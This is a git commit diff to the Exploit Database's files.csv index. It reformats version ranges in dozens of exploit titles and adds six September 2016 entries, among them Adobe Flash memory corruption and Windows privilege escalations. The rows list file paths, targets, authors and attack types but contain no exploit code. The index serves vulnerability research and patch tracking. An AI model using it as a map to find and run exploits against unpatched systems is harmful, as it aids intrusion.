DB: 2016-09-24
5 new exploits EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5) Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3) Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3) Adobe Acrobat Reader 7<9 - U3D Buffer Overflow Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit) Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Adobe Flash - Crash When Freeing Memory After AVC decoding Adobe Flash - Video Decompression Memory Corruption Linux - SELinux W+X Protection Bypass via AIO Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass Microsoft Excel 95<2004 - Malformed Graphic File Code Execution Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution Git-1.9.5 - ssh-agent.exe Buffer Overflow Git 1.9.5 - ssh-agent.exe Buffer Overflow Skybox Platform <=7.0.611 - Multiple Vulnerabilities Skybox Platform <= 7.0.611 - Multiple Vulnerabilities SOLIDserver <=5.0.4 - Local File Inclusion SOLIDserver <= 5.0.4 - Local File Inclusion WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#) Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
This commit is contained in:
parent
12047d93f1
commit
102574cb3e
6 changed files with 179 additions and 21 deletions
47
files.csv
47
files.csv
|
@ -3765,7 +3765,7 @@ id,file,description,date,author,platform,type,port
|
|||
4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0
|
||||
4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0
|
||||
4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0
|
||||
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
|
||||
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
|
||||
4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
|
||||
4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
|
||||
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
|
||||
|
@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port
|
|||
5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
|
||||
5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0
|
||||
5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
|
||||
5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0
|
||||
5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
|
||||
5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
|
||||
|
@ -5252,7 +5252,7 @@ id,file,description,date,author,platform,type,port
|
|||
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0
|
||||
5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
|
||||
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
|
||||
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
|
||||
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
|
||||
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0
|
||||
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
|
||||
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local,0
|
||||
|
@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port
|
|||
5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0
|
||||
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0
|
||||
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0
|
||||
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
|
||||
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
|
||||
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0
|
||||
5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0
|
||||
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0
|
||||
|
@ -5349,7 +5349,7 @@ id,file,description,date,author,platform,type,port
|
|||
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
|
||||
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
|
||||
5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
|
||||
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0
|
||||
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0
|
||||
5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0
|
||||
|
@ -8947,7 +8947,7 @@ id,file,description,date,author,platform,type,port
|
|||
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
|
||||
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
|
||||
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
|
||||
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
|
||||
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
|
||||
|
@ -9238,7 +9238,7 @@ id,file,description,date,author,platform,type,port
|
|||
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
|
||||
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
|
||||
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0
|
||||
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
|
||||
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
|
||||
9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0
|
||||
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
|
||||
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
|
||||
|
@ -9256,7 +9256,7 @@ id,file,description,date,author,platform,type,port
|
|||
9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0
|
||||
9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0
|
||||
9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0
|
||||
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7<9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
|
||||
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
|
||||
9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Buffer Overflow",2009-10-29,Dr_IDE,windows,local,0
|
||||
9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
|
||||
9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
|
||||
|
@ -9332,7 +9332,7 @@ id,file,description,date,author,platform,type,port
|
|||
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0
|
||||
9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0
|
||||
9949,platforms/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0
|
||||
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
|
||||
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
|
||||
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129
|
||||
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
|
||||
9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
|
||||
|
@ -16316,7 +16316,7 @@ id,file,description,date,author,platform,type,port
|
|||
18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
|
||||
18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
|
||||
18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0
|
||||
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
|
||||
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
|
||||
18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps,0
|
||||
18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos,0
|
||||
18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos,0
|
||||
|
@ -18317,6 +18317,7 @@ id,file,description,date,author,platform,type,port
|
|||
21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0
|
||||
21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0
|
||||
21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0
|
||||
40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0
|
||||
21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0
|
||||
21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0
|
||||
21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local,0
|
||||
|
@ -18329,6 +18330,7 @@ id,file,description,date,author,platform,type,port
|
|||
21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
|
||||
21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0
|
||||
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
|
||||
40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0
|
||||
21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
|
||||
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
|
||||
21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
|
||||
|
@ -18393,6 +18395,7 @@ id,file,description,date,author,platform,type,port
|
|||
21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0
|
||||
21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0
|
||||
21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify - Buffer Overflow",2001-09-03,foo,hp-ux,local,0
|
||||
40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0
|
||||
21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
|
||||
21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0
|
||||
21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0
|
||||
|
@ -18438,6 +18441,7 @@ id,file,description,date,author,platform,type,port
|
|||
21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
|
||||
21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
|
||||
21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
|
||||
40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0
|
||||
21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
|
||||
21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",multiple,remote,0
|
||||
21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0
|
||||
|
@ -18506,6 +18510,7 @@ id,file,description,date,author,platform,type,port
|
|||
21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0
|
||||
21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0
|
||||
21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0
|
||||
40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0
|
||||
21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote,0
|
||||
21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0
|
||||
21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0
|
||||
|
@ -18764,7 +18769,7 @@ id,file,description,date,author,platform,type,port
|
|||
21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,php,webapps,0
|
||||
21479,platforms/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,php,webapps,0
|
||||
21480,platforms/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,cgi,webapps,0
|
||||
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
|
||||
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
|
||||
21482,platforms/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos,0
|
||||
21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0
|
||||
21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
|
||||
|
@ -19485,7 +19490,7 @@ id,file,description,date,author,platform,type,port
|
|||
22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
|
||||
22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
|
||||
22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
|
||||
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
|
||||
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
|
||||
22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
|
||||
22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
|
||||
22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
|
||||
|
@ -23911,7 +23916,7 @@ id,file,description,date,author,platform,type,port
|
|||
26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0
|
||||
26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
|
||||
26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
|
||||
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
|
||||
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
|
||||
26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
|
||||
26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
|
||||
26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
|
||||
|
@ -24216,7 +24221,7 @@ id,file,description,date,author,platform,type,port
|
|||
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95<2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
|
||||
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
|
||||
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
|
||||
27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
|
||||
27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0
|
||||
|
@ -34693,7 +34698,7 @@ id,file,description,date,author,platform,type,port
|
|||
